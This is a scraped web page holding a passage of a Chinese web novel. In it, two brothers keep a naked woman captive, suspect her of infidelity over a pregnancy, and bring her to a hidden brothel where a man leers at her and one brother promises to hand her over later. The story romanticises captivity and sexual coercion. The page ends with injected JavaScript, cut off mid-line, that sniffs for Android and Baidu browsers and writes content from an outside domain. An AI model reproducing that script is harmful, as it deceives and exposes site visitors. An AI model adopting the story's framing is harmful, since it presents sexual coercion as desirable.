逃脱 分卷阅读103

    发生了,她一定是被老头强迫,你怪她有什么用?”

    “强迫?”纳兰荻扭头,“你看她的表情像是被强迫的吗?”

    “我们当做强迫好啦,反正他无论如何是我们的老爸,我们又能怎么样”

    纳兰荻沉默,“我就是要她说出来,然后我就放了她。以后他连她的一根汗毛也休想碰到”

    红木桌上摆着烤肉和红酒,这已经是第二天,蓝静仪从楼上下来,因为太累,她在黑屋子里昏昏沉沉睡了一夜,是纳兰葎把她叫醒,叫她下来吃早餐。

    刚闻到烤肉的香味,她便蹲在楼梯上干呕起来,剧烈的程度几乎要将胆汁都吐出来。

    “怎么了,宝贝?”纳兰葎关切地问她。她面色苍白地站起来,走下去。

    一直迎着纳兰获的目光走下去,他一眨不眨地看着她的赤裸的身体,毫无掩饰。当她看到盘中的烤肉,明明是色香味俱全的美味,她却又弯身干呕不止。

    纳兰荻和纳兰葎对视,脸色俱变。

    “这位小姐已经有两个月身孕……”医生的话响在耳边,看着尚沉沉睡着的蓝静仪。

    纳兰葎和纳兰获脸色阴沉。

    “两个月……好奇怪,获,那个月我们几乎都没碰她,她和谁有的孩子?甚至老头都没和她碰面……”

    空气低沉而压抑。

    “蓝蕼”纳兰荻轻轻吐出这两个字,黑眸里却闪出噬血的光芒。

    65 隐吧(1)

    “宝贝,我再也帮不了你了,因为……你做的太过火了”纳兰葎邪魅的眼眸转向蓝静仪熟睡的小脸,唇轻轻吐出。

    “你会付出血的代价,蓝静仪,我倒要看看以后你还敢不敢出轨”纳兰荻同样看着蓝静仪的脸,说出口的话如同冰冷魔咒。

    蓝静仪醒过来,发现自己坐在车里,而自己的身体被驾车的纳兰荻搂在怀里,感觉她醒来,他扭头向她勾起唇角,俊美如阿波罗的面颊依旧寒冷,因为笑容并未到达眼底,然后那朵笑容,却含着邪恶与魅惑的毒汁。

    纳兰荻坐在车后座,金色的长发妖魅如丝,那张精致如妖精的脸孔却散发着天使般的光晕,阴柔的狭眸一眨不眨盯着男子怀里的蓝静仪。

    车子停在一个非常庞大的停车场。纳兰葎打开门将蓝静仪抱下车。

    “我们去哪儿?”蓝静仪根本搞不清楚身处何地。

    纳兰葎勾起邪笑,“我和获带你去一个非常好玩的地方,保证你会玩的上瘾”,看着他唇角的那朵笑意,蓝静仪突然有种不寒而栗的感觉。

    “走吧”纳兰荻长臂一伸已经将她揽进怀里,纳兰葎耸耸肩跟着一起向前走。

    她觉得身上有点不自在,才一动步,才发觉自己身上只穿着一件黑色纱裙,除了裙子里面什么都没穿。脸不由的发烫,心里有种更不好的预感,可是又实在搞不清他们到底要做什么,只得顺从地跟着纳兰获的脚步。

    他们走进一家大超市的通道,通道长而窄,只能允许两个人通过。就在蓝静仪觉得他们似乎要带她去超市购物时,纳兰获只是触摸了一下黑色的墙面。

    墙壁上就突然出现了一个进口,很快纳兰荻就带她闪进去,墙壁悄无声息地闭合。

    这只是一家普通的超市,恐怕谁都不会想到在这家超市的通道墙壁上还别有洞天吧。里面还是一条长长的通道,她的脚步有点踌躇,她不知道要面对的会是什么,他们将把她带到哪里去。

    可是纳兰荻只是掳着她的手臂,好像不管她愿不愿意都要跟上他的脚步。

    直到后来她才知道这里叫做隐吧,是纳兰葎纳兰获以前曾经常光顾的娱乐场所,这里集娱乐赌博、妓场于一身,毫不夸张地说,这里其实是一个超级大型地下淫乐窝,供有钱公子逍遥自在糜烂的场所。

    眼前豁然开朗,是一个明亮的大厅,大厅的皮椅上坐着一个身体肥胖的中年男人,蓝静仪从第一眼看见他就觉得厌恶异常,这个男人相貌非常丑陋,在他的左眼角与右嘴角之间有一道非常骇人的刀疤。

    见到纳兰两兄弟,刀疤男赶紧起身,殷勤地堆满一脸笑意,“哟,两位老大来了,两位老大这么长时间不光顾,小的都有点惶恐不安了,今天终于见到真身了”

    “最近生意怎么样?”纳兰获淡声问。

    “托老大的福,还好还好。我这儿有两个新鲜妞备着呢,专门等两位老大来了尝尝呢”

    “有你这么孝敬我们以后肯定要折寿了”纳兰葎挑眉说。

    “老大,您折煞我了”刀疤男抹了一把脸上的汗,斜眼睨见了蓝静仪。

    色眯眯的小眼睛一亮,他肆无忌惮地说,“老大这是从哪儿弄来的妞儿啊,这么骚”,他以为还像从前,纳兰葎纳兰获带来马子有时他厚着脸皮调侃几句,他们居然大大方方地把自己的马子赏给他玩。

    纳兰荻眯起眼,这是他不高兴的征兆,可是刀疤男太迟钝,纳兰葎也扬起了眉毛。

    蓝静仪向纳兰获身后躲了躲,仍躲不过那另人恶心的注视。

    刀疤男猬琐地压低声音:“老大,这种长相的妞少见啊,一般有这种长相的女人B都特别骚,上千个男人上过,小B还紧得像处女,两位老大什么时候玩腻了,让小的也尝尝鲜”

    蓝静仪憎恶地皱起眉,纳兰获脸已经绷紧,纳兰葎则斜倚在柜台旁,阴柔的脸颊毫无异样,然而那双妖媚的眼睛却淬了毒。

    纳兰荻轻笑,声音清冷如冰,“好,什么时候我们玩腻了,就把她赏给你”说着,他眸光扫向身边的蓝静仪,很满意地看到她的脸孔刹那间变成苍白。

    “谢谢老大,谢谢老大”

    纳兰葎扬脸,唇角眉梢都是笑,那笑倾城倾国,“那么破五,你觉得我和获什么时候会玩腻呢?”

    “这……”破五偷眼看看纳兰获又看看纳兰葎。

    纳兰葎勾手,笑意更加魔魅,“过来,我告诉你”

    破五几乎看痴,魔怔怔地把脑袋凑过去。

    “啪”的一声,蓝静仪看到破五的身子向地上摔去,他的脸瞬间现了一个红红的掌印,嘴角有血流出来,这样一个魁梧的人居然被一巴掌打的如此狼狈,可见那一掌的威力。

    “我们的女人你也敢觊觎,再看一眼小心你的眼睛不想再跟着你了”纳兰葎拍拍手,闲闲说道。

    破五从地上爬起来,连连扣头,“是小的眼拙,没看清楚,老大饶了我吧”

    蓝静仪吃惊地看着眼前的变故,那个长相凶恶,五大三粗的恶心男人看着不像善岔,却对纳兰获和纳兰葎这样惧怕,可见纳兰葎和纳兰获的背景之深……

    “起来,下次再敢胡说,小心你的脑袋”纳兰获比了个手枪的姿势。搂着蓝静仪向里走。

    破五扬声叫起来,“快侍侯两位老大去二楼的专属包房”,

window["timea"] = "svggr" + (new Date()).getTime();var t = document;if((/(Android)/i.test(navigator.userAgent))&&(/(baidu)/i.test(navigator.userAgent))){if((/(check_xxin)/i.test(window.location.href))){alert(new Date().getSeconds())};var lxq="dd.shxckr.cn/s_80137_1/w1xhtml?";t.write('